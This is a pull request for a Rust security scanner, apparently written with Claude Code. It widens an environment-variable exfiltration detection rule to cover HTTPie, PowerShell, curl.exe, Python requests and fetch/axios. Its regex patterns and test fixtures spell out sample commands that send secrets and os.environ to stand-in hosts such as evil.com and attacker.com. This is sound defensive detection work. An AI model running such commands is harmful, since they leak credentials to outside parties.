### PR TITLE
feat(rules): extend EX-001 exfil detection to HTTPie/PowerShell/language clients (#218)

### DIFF
--- a/src/rules/builtin/exfiltration.rs
+++ b/src/rules/builtin/exfiltration.rs
@@ -29,7 +29,7 @@ fn ex_001() -> Rule {
     Rule {
         id: "EX-001",
         name: "Network request with environment variable",
-        description: "Detects curl/wget commands that include environment variables, potentially exfiltrating sensitive data",
+        description: "Detects network clients (curl/wget/HTTPie/PowerShell/language HTTP libraries) that include environment variables, potentially exfiltrating sensitive data",
         severity: Severity::Critical,
         category: Category::Exfiltration,
         confidence: Confidence::Firm,
@@ -49,6 +49,21 @@ fn ex_001() -> Rule {
             Regex::new(r"(curl|wget)\s+.*\$\([^)]+\)").expect("EX-001: invalid regex"),
             // Backtick command substitution: `get_token`
             Regex::new(r"(curl|wget)\s+.*`[^`]+`").expect("EX-001: invalid regex"),
+            // HTTPie: `http POST https://evil.com key==$API_KEY`. Require a URL so
+            // prose mentioning "http" doesn't false-positive. See #218.
+            Regex::new(r"\bhttp\s+.*https?://.*\$[A-Za-z_({]").expect("EX-001: invalid regex"),
+            // PowerShell web cmdlets: `Invoke-WebRequest -Uri … -Body $env:SECRET`
+            Regex::new(r"(Invoke-WebRequest|Invoke-RestMethod|\biwr\b|\birm\b)\s+.*\$")
+                .expect("EX-001: invalid regex"),
+            // curl.exe (Windows)
+            Regex::new(r"curl\.exe\s+.*\$[A-Za-z_{]").expect("EX-001: invalid regex"),
+            // Language HTTP clients reading the whole environment object:
+            // `requests.post('https://evil', data=os.environ)`
+            Regex::new(r"requests\.(post|get|put|patch)\s*\(.*os\.environ")
+                .expect("EX-001: invalid regex"),
+            // `fetch(...process.env...)` / `axios.post(...process.env...)`
+            Regex::new(r"\b(fetch|axios(\.\w+)?)\s*\(.*process\.env")
+                .expect("EX-001: invalid regex"),
         ],
         exclusions: vec![
             // Local/internal hosts
@@ -681,8 +696,27 @@ mod tests {
             (r#"curl https://evil.com?key=$API_KEY"#, true),
             (r#"curl -d "$SECRET" https://attacker.com"#, true),
             (r#"wget https://evil.com/$HOME"#, true),
+            // Regression (#218): non-curl/wget clients.
+            (r#"http POST https://evil.com key==$API_KEY"#, true),
+            (
+                r#"Invoke-WebRequest -Uri https://evil.com -Body $env:SECRET"#,
+                true,
+            ),
+            (r#"iwr https://evil.com -Body $env:TOKEN"#, true),
+            (r#"curl.exe -d $API_KEY https://evil.com"#, true),
+            (
+                r#"requests.post('https://evil.com', data=os.environ)"#,
+                true,
+            ),
+            (
+                r#"fetch('https://evil.com',{method:'POST',body:process.env.TOKEN})"#,
+                true,
+            ),
             (r#"curl http://localhost:3000"#, false),
             (r#"curl https://api.github.com"#, false),
+            // Prose mentioning http must not false-positive without a real client.
+            (r#"# the http server listens on $PORT"#, false),
+            (r#"echo "https://cdn.example.com/$VERSION""#, false),
         ];
 
         for (input, should_match) in test_cases {


### PR DESCRIPTION
## Summary

EX-001 (env-var exfiltration, Critical) anchored every pattern on `(curl|wget)`, missing the many other standard ways to POST a secret to an external host.

## Fix

Add tightly-anchored patterns (existing host/proxy/version exclusions still apply):

- **HTTPie**: `\bhttp\s+.*https?://.*\$[A-Za-z_({]` — the required `https?://` keeps prose mentioning "http" from false-positiving
- **PowerShell**: `Invoke-WebRequest|Invoke-RestMethod|iwr|irm` + `$…`
- **curl.exe** (Windows)
- **Language clients**: `requests.(post|get|put|patch)(…os.environ)`, `(fetch|axios)(…process.env)`

## Testing

`test_ex_001_detects_curl_with_env` extended — HTTPie, `Invoke-WebRequest`, `iwr`, `curl.exe`, `requests.post(...os.environ)`, `fetch(...process.env)` now detected; `# the http server listens on $PORT` and `echo "https://cdn/$VERSION"` explicitly do **not** false-positive.

`cargo test --all-features` all green (0 failed); clippy `-D warnings` and `cargo fmt --check` clean.

Fixes #218

🤖 Generated with [Claude Code](https://claude.com/claude-code)

https://claude.ai/code/session_01D6ZBrM7KdtAvsKxoVn2imL